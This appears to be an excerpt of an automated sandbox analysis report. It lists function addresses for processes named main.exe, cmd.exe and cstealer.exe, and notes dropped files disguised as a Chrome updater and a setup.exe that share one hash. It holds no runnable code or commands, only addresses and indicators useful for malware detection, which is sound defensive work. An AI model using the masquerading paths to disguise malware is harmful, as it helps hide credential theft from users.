                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA28904_2_00007FF6D6EA2890
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA20704_2_00007FF6D6EA2070
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EB6DCC4_2_00007FF6D6EB6DCC
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EB75504_2_00007FF6D6EB7550
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA35404_2_00007FF6D6EA3540
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EB17204_2_00007FF6D6EB1720
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EB4EFC4_2_00007FF6D6EB4EFC
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA8EF44_2_00007FF6D6EA8EF4
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA3ED04_2_00007FF6D6EA3ED0
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EB26C44_2_00007FF6D6EB26C4
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA26844_2_00007FF6D6EA2684
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA84BC4_2_00007FF6D6EA84BC
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EAECA04_2_00007FF6D6EAECA0
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA24804_2_00007FF6D6EA2480
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EAAC504_2_00007FF6D6EAAC50
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EAF3204_2_00007FF6D6EAF320
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6E992D04_2_00007FF6D6E992D0
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA42D44_2_00007FF6D6EA42D4
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA2A944_2_00007FF6D6EA2A94
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EB17204_2_00007FF6D6EB1720
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA22744_2_00007FF6D6EA2274
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EB4A604_2_00007FF6D6EB4A60
                                Source: C:\Windows\System32\cmd.exeCode function: 5_2_00000230D90F38A85_2_00000230D90F38A8
                                Source: C:\Windows\System32\cmd.exeCode function: 5_2_00000230D90ED0E05_2_00000230D90ED0E0
                                Source: C:\Windows\System32\cmd.exeCode function: 5_2_00000230D90E1F2C5_2_00000230D90E1F2C
                                Source: C:\Windows\System32\cmd.exeCode function: 5_2_00000230D92244A85_2_00000230D92244A8
                                Source: C:\Windows\System32\cmd.exeCode function: 5_2_00000230D921DCE05_2_00000230D921DCE0
                                Source: C:\Windows\System32\cmd.exeCode function: 5_2_00000230D9212B2C5_2_00000230D9212B2C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E712638A87_2_0000014E712638A8
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E7125D0E07_2_0000014E7125D0E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E71251F2C7_2_0000014E71251F2C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E71282B2C7_2_0000014E71282B2C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E712944A87_2_0000014E712944A8
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E7128DCE07_2_0000014E7128DCE0
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 8_2_00007FF8A8F286108_2_00007FF8A8F28610
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 8_2_00007FF8BA2477188_2_00007FF8BA247718
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E318E09_2_00007FF8A7E318E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DBA8C09_2_00007FF8A7DBA8C0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DA28889_2_00007FF8A7DA2888
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DB68009_2_00007FF8A7DB6800
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E4F8109_2_00007FF8A7E4F810
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DCB7C09_2_00007FF8A7DCB7C0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E247809_2_00007FF8A7E24780
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E517709_2_00007FF8A7E51770
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DBB7709_2_00007FF8A7DBB770
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DE26809_2_00007FF8A7DE2680
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DA665D9_2_00007FF8A7DA665D
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DA66559_2_00007FF8A7DA6655
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DCA6209_2_00007FF8A7DCA620
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E3E5F09_2_00007FF8A7E3E5F0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E1F5E09_2_00007FF8A7E1F5E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DC45C09_2_00007FF8A7DC45C0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DCE5A09_2_00007FF8A7DCE5A0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E3F5B09_2_00007FF8A7E3F5B0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E505B09_2_00007FF8A7E505B0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DC55B09_2_00007FF8A7DC55B0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E065909_2_00007FF8A7E06590
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DCC5409_2_00007FF8A7DCC540
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E314E09_2_00007FF8A7E314E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E5C4D09_2_00007FF8A7E5C4D0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E124B09_2_00007FF8A7E124B0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DAF4B09_2_00007FF8A7DAF4B0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E423E09_2_00007FF8A7E423E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E433D09_2_00007FF8A7E433D0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E2B3909_2_00007FF8A7E2B390
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DAA3709_2_00007FF8A7DAA370
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DB83709_2_00007FF8A7DB8370
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DE82709_2_00007FF8A7DE8270
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DAE2209_2_00007FF8A7DAE220
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DC21E09_2_00007FF8A7DC21E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E471D09_2_00007FF8A7E471D0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E4E1D09_2_00007FF8A7E4E1D0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DA41809_2_00007FF8A7DA4180
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E021609_2_00007FF8A7E02160
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DF71509_2_00007FF8A7DF7150
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DBB1209_2_00007FF8A7DBB120
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DA60F09_2_00007FF8A7DA60F0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DA30D49_2_00007FF8A7DA30D4
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E0F0909_2_00007FF8A7E0F090
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DF80209_2_00007FF8A7DF8020
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DCB0009_2_00007FF8A7DCB000
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E4EFE09_2_00007FF8A7E4EFE0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E25FD09_2_00007FF8A7E25FD0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DB4FD09_2_00007FF8A7DB4FD0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DECF809_2_00007FF8A7DECF80
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E24F909_2_00007FF8A7E24F90
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E0BF709_2_00007FF8A7E0BF70
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DF4F509_2_00007FF8A7DF4F50
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E4BF209_2_00007FF8A7E4BF20
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DBFF009_2_00007FF8A7DBFF00
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DC6E709_2_00007FF8A7DC6E70
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DA8DC09_2_00007FF8A7DA8DC0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E17DD09_2_00007FF8A7E17DD0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E16DC09_2_00007FF8A7E16DC0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DE6DB09_2_00007FF8A7DE6DB0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DB1D909_2_00007FF8A7DB1D90
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DFDD009_2_00007FF8A7DFDD00
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DD9D169_2_00007FF8A7DD9D16
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E27CD09_2_00007FF8A7E27CD0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E48C509_2_00007FF8A7E48C50
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DA3B709_2_00007FF8A7DA3B70
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DF6B109_2_00007FF8A7DF6B10
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DFFB109_2_00007FF8A7DFFB10
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DA6A629_2_00007FF8A7DA6A62
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DD3A009_2_00007FF8A7DD3A00
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E229E09_2_00007FF8A7E229E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DE49C09_2_00007FF8A7DE49C0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DF99809_2_00007FF8A7DF9980
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DEC9409_2_00007FF8A7DEC940
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DFB9209_2_00007FF8A7DFB920
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7F112E09_2_00007FF8A7F112E0
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A7F118D0
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80323F1
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8035D9E
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A81D2A90
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8034D04
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8112B40
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8035B0F
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8031B22
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8034633
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80372C0
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A803213F
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A804EF00
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A816B020
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8036EEC
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A804F060
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80329CD
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8166130
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8033486
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8033693
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8031A4B
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8037077
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8036FFA
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8035A60
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8031CC1
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8162670
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8034E4E
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80360D7
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8035E20
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8036A82
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A803655A
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A81D39D0
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A81E7A10
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8034165
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8167AF0
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80330C1
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80332E7
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8032289
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A804BD60
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8032766
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A815FE30
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8034C37
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A804BF20
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8032E8C
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8034101
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8036CB7
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A803114F
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A805B1C0
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A804F200
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8035D85
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8033B93
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8035169
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8167310
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A826F460
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A805B550
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8037045
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8031EA1
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8036F23
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A809F700
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80322E8
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80321B7
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A803609B
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8033FDA
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80311CC
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8036D57
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8032FCC
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A81E4A10
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8034C14
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8034A54
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80326E9
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A803592F
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80322FC
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8031140
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8031217
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80310AA
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8031F96
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8036EBA
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A803659B
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8034403
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A803362F
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A803144C
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8033189
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A815CF90
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8170F90
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8037108
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8170120
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8035B73
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8031424
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8032C75
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A81E82E0
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80E0440
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A804C480
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80325EF
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80369E2
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A815C5F0
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A804C620
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A803177B
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8036C1C
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80322AC
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8034B56
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A803275C
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8032D74
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A81D1920
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80359F7
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A81E99E0
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8033A85
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80350AB
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8031CFD
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8037252
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8033832
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80335FD
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A803266C
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8032982
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8032D0B
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80372A7
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8033BA2
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8031622
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8037365
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8031D83
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8165E30
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8034746
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A803378D
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8034359
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8031B31
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80357D1
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80368C5
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8035BF0
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8055200
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A81E9210
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A804D260
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8034287
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80344C6
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80353A8
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8035F0B
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8035510
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A803560F
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80354CA
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8033A8F
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80315C8
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80354CF
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A81715C0
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8034AC5
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A803542F
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8035047
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8036389
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A803655F
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8031299
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8034F3E
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A803216C
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A8032135
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8A80353C1
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe Code function: 9_2_00007FF8B7E37A58
                                Source: Joe Sandbox ViewDropped File: C:\Program Files\Google\Chrome\updater.exe BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                Source: Joe Sandbox ViewDropped File: C:\ProgramData\setup.exe BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A8032A04 appears 172 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A803483B appears 129 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A8034D68 appears 34 times
